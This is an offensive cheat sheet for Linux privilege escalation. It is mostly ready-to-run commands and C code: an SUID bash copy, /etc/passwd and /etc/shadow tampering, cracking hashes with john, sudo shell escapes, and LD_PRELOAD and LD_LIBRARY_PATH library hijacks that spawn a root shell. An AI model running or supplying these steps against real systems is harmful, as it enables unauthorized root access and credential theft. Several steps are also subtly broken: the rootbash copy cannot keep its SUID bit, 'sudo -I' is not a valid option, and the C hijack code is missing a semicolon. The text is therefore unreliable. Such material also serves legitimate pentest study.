*nix Privilege Escalation
Tool References
Linux Exploit Suggester - Provides a list of vulnerabilities based on the provided kernel version.
Linux Smart Enumeration (LSE) - Linux privilege escalation enumeration script that includes three verbosity levels.
LinPEAS - Script that searches for Linux privilege escalation paths.
pspy - Command line tool designed to snoop on processes and viewing commands run by other users, cron jobs, etc. as they execute.
GTFOBins - List of Unix binaries that can be used to bypass local security restrictions.
Linux Smart Enumeration (LSE)
#Runs LSE in non-interactive mode. Start with level 0 (default), then do a level 1 (interesting), and lastly a level 2 (show all) scan
./lse -i -l 0Manual PrivEsc Enumeration & Exploitation
Kernel Exploit Enumeration
#Enumerate *nix version information
uname -a
#Find potential exploits
./linux-exploit-suggester-2.pl -k <kernel_version>"rootbash" SUID
#Check if /bin/bash is owned by root and has SUID bit set
ls -l /bin/bash
#Create a copy of /bin/bash
cp /bin/bash /tmp/rootbash
#Spawn a root shell by executing 'rootbash' with -p
rootbash -pSUID and SGID Bit Set Files
#Find files with SUID and SGID bits set
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullWeak File Permissions
PASSWD and SHADOW
#Check file permissions on /etc/passwd and /etc/shadow
ls -al /etc/
#/etc/passwd - If modifiable or able to append:
##Depending on *nix version, can replace the hash "x" with new hash
openssl passwd "<password>"
root:x:0:0:root:/root:/bin/bash
##Add a new user with ID 0 (root)
#/etc/shadow - If readble attempt to crack hashes
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --wordlist=<path_to_wordlist> unshadowed.txt
#/etc/shadow - If modiable, can replace password hash
mkpasswd -m sha-512 <new_password_value>SUDO Direct Escalation
#Check if we can escalate privileges directly to root:
##Switch to root
sudo su
##Run the shell specified by the SHELL environment variable
sudo -s
##Run Shell Specified by User's Password Database Entry:
sudo -I
##Launch Bash via root
sudo /bin/bash
##Change root password
sudo passwd
#List programs a user is allowed and disallowed to run, and that run under root:
sudo -l
#Check for shell escapes and other vulnerabilities against GTFOBins
sudo <service>Environment Variables & LD_PRELOAD
#List programs a user is allowed and disallowed to run, and that run under root
#Check if env_keep option includes the LD_PRELOAD environment variable
sudo -l
#If set, compile the below code which should spawn a shell
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
#Run any allowed program using sudo while setting the LD_PRELOAD variable to the shared object we created
sudo LD_PRELOAD=/tmp/preload.so findEnvironment Variables & LD_LIBRARY_PATH
#List programs a user is allowed and disallowed to run, and that run under root
#Check if the LD_LIBRARY_PATH environment variable is preserved
sudo -l
#Run the ldd command against the programs listed above
ldd <service_path>
#Check permissions of shared objects listed above.
ls -l <file_path>
#If write is possible, compile the below code and rename to the same object we want to replace, and replace the shared object
gcc -o <shared_object_name_replacing> -shared -fPIC <name_of_c_file>
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack()
{
unsetenv("LD_LIBRARY_PATH")
setresuid(0,0,0);
system("/bin/bash -p");
}
#Run the service chosen, setting the LD_LIBRARY_PATH to the directory of our compiled code
sudo LD_LIBRARY_PATH=. <service_name>SUID & SGID Files
#Find files with the SUID and SGID bits set that run with elevated privileges
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullLast updated